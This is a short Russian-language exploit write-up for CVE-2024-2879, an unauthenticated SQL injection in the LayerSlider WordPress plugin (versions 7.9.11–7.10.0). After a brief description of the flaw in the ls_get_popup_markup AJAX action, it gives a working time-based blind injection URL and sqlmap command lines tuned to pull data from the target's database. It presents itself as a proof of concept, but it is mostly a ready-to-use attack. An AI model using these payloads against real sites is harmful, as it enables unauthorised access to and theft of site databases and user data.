
Эксплойт proof-of-concept для CVE-2024-2879: не требующая аутентификации SQL-инъекция в плагине LayerSlider для WordPress (7.9.11-7.10.0). Включает скрипт сканера и руководство по эксплуатации с помощью SQLMap для извлечения информации из базы данных.
LayerSlider 7.9.11 – 7.10.0 – неаутентифицированная SQL-инъекция
Плагин LayerSlider для WordPress уязвим к SQL-инъекции через действие ls_get_popup_markup в версиях 7.9.11 и 7.10.0 из-за недостаточного экранирования пользовательского параметра и отсутствия должной подготовки существующего SQL-запроса. Это позволяет неаутентифицированным злоумышленникам добавлять дополнительные SQL-запросы в уже существующие запросы, которые могут быть использованы для извлечения конфиденциальной информации из базы данных.

"http://site.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and (SELECT 6416 FROM (SELECT(SLEEP(5)))nEiK)-- vqlq"
Задержка ответа 5 секунд

sqlmap "https:://site.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=" --risk=3 --level=4 --dbms=mysql --technique=T
или
sqlmap -r request.txt --risk=3 --level=4 --dbms=mysql --technique=T